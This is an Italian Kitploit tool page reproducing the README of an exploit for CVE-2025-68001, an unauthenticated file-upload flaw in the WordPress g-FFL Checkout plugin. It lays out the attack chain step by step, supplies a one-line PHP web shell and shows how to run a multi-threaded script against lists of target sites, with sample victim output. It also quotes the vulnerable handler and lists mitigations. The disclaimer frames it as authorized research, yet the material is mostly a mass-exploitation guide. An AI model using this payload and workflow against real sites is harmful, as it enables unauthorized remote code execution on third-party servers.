Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-68001 — WordPress g-FFL Checkout Plugin <= 2.1.0 è vulnerabile a un caricamento arbitrario di file ad alta priorità | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-68001
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubnxploited/cve-2025-68001

CVE-2025-68001

WordPress g-FFL Checkout Plugin <= 2.1.0 è vulnerabile a un caricamento arbitrario di file ad alta priorità

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-68001

Il plugin WordPress g-FFL Checkout <= 2.1.0 è vulnerabile a un Arbitrary File Upload ad alta priorità

root@kitploit:~
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 Resta un passo avanti. Unisciti a @KNxploited su Telegram — la tua fonte esclusiva per le ultime CVE, zero-day e ricerca exploit all'avanguardia. Aggiornato costantemente. Non per tutti.


📋 Panoramica

CVE-2025-68001 è una vulnerabilità critica di Unauthenticated Arbitrary File Upload (caricamento arbitrario di file senza autenticazione) scoperta nel plugin WordPress g-FFL Checkout di garidium.

La vulnerabilità consente a un attaccante remoto non autenticato di caricare file arbitrari — inclusi web shell — sul server di destinazione tramite l'azione AJAX ffl_upload_document, portando a completa Remote Code Execution (RCE).

CampoDettagli
CVE IDCVE-2025-68001
Pluging-FFL Checkout (g-ffl-checkout)
Versioni interessaten/a fino a <= 2.1.0
Tipo di vulnerabilitàCaricamento file senza restrizioni
ImpattoRemote Code Execution (RCE)
AutenticazioneNon richiesta
Gravità CVSSCritica
RicercatoreNxploited

⚙️ Come Funziona

L'exploit segue una precisa catena d'attacco multi-step:

root@kitploit:~
1. GET /checkout
      ↓
   Extract `checkout_nonce` from inline JavaScript data

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<extracted_nonce>
      document_type=document
      document=<shell.php disguised as image/png>
      ↓
   Server stores the file without extension or MIME validation

3. Parse JSON response
      ↓
   Extract uploaded file path / unique filename

4. Access uploaded shell via HTTP
      ↓
   Remote Code Execution achieved ✔️

Il plugin espone un endpoint AJAX ffl_upload_document che:

  • Accetta caricamenti di file senza alcun controllo di autenticazione
  • Non esegue alcuna validazione del tipo di file lato server
  • Restituisce il percorso del file salvato nella sua risposta JSON

🔧 Requisiti

Installa tutte le dipendenze prima di eseguire:

root@kitploit:~
pip install requests rich
DipendenzaScopo
requestsRichieste HTTP e gestione delle sessioni
richInterfaccia terminale, barre di avanzamento, pannelli
threadingElaborazione multi-thread dei target

È richiesto Python 3.8+.


📂 Struttura dei File

root@kitploit:~
CVE-2025-68001/
├── CVE-2025-68001.py       # Main exploit script
├── shell.php               # Web shell to upload (you provide this)
├── list.txt                # Target URLs (one per line)
└── success_results.txt     # Auto-generated results output

🚀 Utilizzo

Step 1 — Prepara i Tuoi Target

Crea un file list.txt con un URL target per riga:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

Lo script antepone automaticamente http:// se non viene fornito uno schema.


Step 2 — Prepara la Tua Shell

Posiziona la tua web shell PHP nella stessa directory. Esempio di shell minimale:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Salvala come shell.php (o con qualsiasi nome — ti verrà chiesto di inserirlo).


Step 3 — Esegui l'Exploit

root@kitploit:~
python CVE-2025-68001.py

Ti verrà chiesto in modo interattivo:

root@kitploit:~
Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20

Step 4 — Controlla i Risultati

Gli exploit riusciti vengono salvati automaticamente in success_results.txt:

root@kitploit:~
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

Ogni riga contiene:

  • URL del target
  • Percorso del file salvato sul server
  • Nome file univoco assegnato dal server
  • Nome file originale caricato

🖥️ Riferimento Parametri dello Script

PromptDefaultDescrizione
File dei targetlist.txtFile contenente gli URL dei target
File della shellshell.phpShell PHP da caricare sul target
Numero di thread50Worker concorrenti (max: 50)

📊 Esempio di Output

root@kitploit:~
✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

All targets processed ✔️. Results saved to: success_results.txt

🔍 Percorso del Codice Vulnerabile (Tecnico)

La vulnerabilità risiede nel gestore AJAX del plugin registrato senza controlli di capacità:

root@kitploit:~
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ Mitigazione e Rimedio

Se sei un proprietario di sito o sviluppatore, adotta immediatamente i seguenti passaggi:

  • ✅ Aggiorna il plugin g-ffl-checkout a una versione patchata (> 2.1.0) se disponibile
  • ✅ Disattiva il plugin finché non viene confermata una patch
  • ✅ Limita i permessi di esecuzione nelle directory di upload (es. regole .htaccess)
  • ✅ Implementa la validazione del tipo di file lato server e una whitelist rigorosa delle estensioni
  • ✅ Monitora le directory di upload per file .php sospetti
  • ✅ Attiva regole WAF per bloccare le richieste di upload AJAX non autenticate

⚠️ Disclaimer

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.

By using this script, you explicitly agree to the following:

  • You have EXPLICIT written permission from the target system owner.
  • You are operating in a controlled lab or authorized penetration testing engagement.
  • You will NOT use this tool against any system you do not own or have legal
    authorization to test.
  • The author (Nxploited) holds ZERO liability for any damage, data loss,
    legal consequences, or misuse resulting from this tool.

Unauthorized use of this tool against systems without permission is ILLEGAL
and may violate laws including but not limited to:
  — Computer Fraud and Abuse Act (CFAA)
  — EU Directive on Attacks Against Information Systems
  — And equivalent laws in your jurisdiction.

USE RESPONSIBLY. HACK ETHICALLY.

👤 Autore

UsernameNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Segui @KNxploited su Telegram per ricevere le ultime divulgazioni di vulnerabilità, release di exploit e ricerche sulla sicurezza — prima di chiunque altro.


Costruito con precisione da Nxploited · Solo per uso didattico
Scarica lo strumento